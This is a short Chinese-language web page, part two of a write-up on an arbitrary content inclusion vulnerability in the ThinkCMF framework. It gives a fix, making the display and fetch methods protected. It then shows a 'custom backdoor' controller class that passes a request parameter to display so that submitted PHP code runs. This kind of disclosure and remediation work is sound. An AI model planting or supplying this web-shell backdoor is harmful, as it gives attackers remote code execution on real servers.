主页 > 网络知识 > ThinkCMF框架上的任意内容包含漏洞(2)

ThinkCMF框架上的任意内容包含漏洞(2)

 

1.png

 

六、修复方法

将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected

七、自定义后门

可通过新建如下控制类

namespace PortalController;

use ThinkController;

class DoorController extends Controller {

public function index($content) {

parent::display('', '', '',$content, '');

}

}

由于是测试,content未做任何处理,直接传输php代码即可执行。

 

1.png

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!